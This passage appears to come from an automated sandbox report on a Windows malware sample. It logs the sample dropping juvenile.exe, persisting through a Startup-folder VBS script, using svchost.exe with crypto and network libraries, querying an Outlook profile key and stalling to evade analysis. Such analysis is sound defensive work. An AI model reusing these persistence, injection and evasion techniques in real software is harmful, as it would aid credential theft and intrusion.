              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Binary string: _.pdb source: svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: juvenile.exe, 00000006.00000003.1318218958.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000006.00000003.1318472638.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445535094.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445352586.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: juvenile.exe, 00000006.00000003.1318218958.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000006.00000003.1318472638.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445535094.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445352586.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004AE01E LoadLibraryA,GetProcAddress,3_2_004AE01E
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_005205B8 push ss; ret 3_2_005205B9
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004B6B05 push ecx; ret 3_2_004B6B18
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_009605B8 push ss; ret 6_2_009605B9
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008F6B05 push ecx; ret 6_2_008F6B18
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_015664B1 push ebp; retf 6_2_015664B2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0041C40C push cs; iretd 8_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00423149 push eax; ret 8_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0041C50E push cs; iretd 8_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004231C8 push eax; ret 8_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040E21D push ecx; ret 8_2_0040E230
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0041C6BE push ebx; ret 8_2_0041C6BF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FFE558 push eax; iretd 8_2_04FFE559
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0041C40C push cs; iretd 11_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_00423149 push eax; ret 11_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0041C50E push cs; iretd 11_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_004231C8 push eax; ret 11_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0040E21D push ecx; ret 11_2_0040E230
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0041C6BE push ebx; ret 11_2_0041C6BF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CBE558 push eax; iretd 11_2_07CBE559
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AC4F9 push 00000008h; iretd 11_2_086AC4FC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AC4AA push 00000008h; iretd 11_2_086AC4AC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A9B51 push 00000008h; retf 11_2_086A9BE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A9BC8 push 00000008h; retf 11_2_086A9BE8
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: C:\Users\user\Desktop\FACT0987789000900.exeFile created: C:\Users\user\AppData\Local\thixolabile\juvenile.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbsJump to dropped file
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbsJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbsJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004F8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_004F8111
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004AEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_004AEB42
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_00938111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00938111
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008EEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_008EEB42
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004B123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_004B123A
              Source: C:\Users\user\Desktop\FACT0987789000900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeAPI/Special instruction interceptor: Address: 1569A24
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeAPI/Special instruction interceptor: Address: 126550C
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 4FF0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5540000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 7540000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5790000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5790000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 7790000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599670Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599558Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598797Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598562Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598342Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598125Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598015Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597906Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597769Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597631Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597436Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597309Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597200Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597093Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596984Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596547Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596422Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596312Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596093Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595984Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595874Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595765Jump to behavior
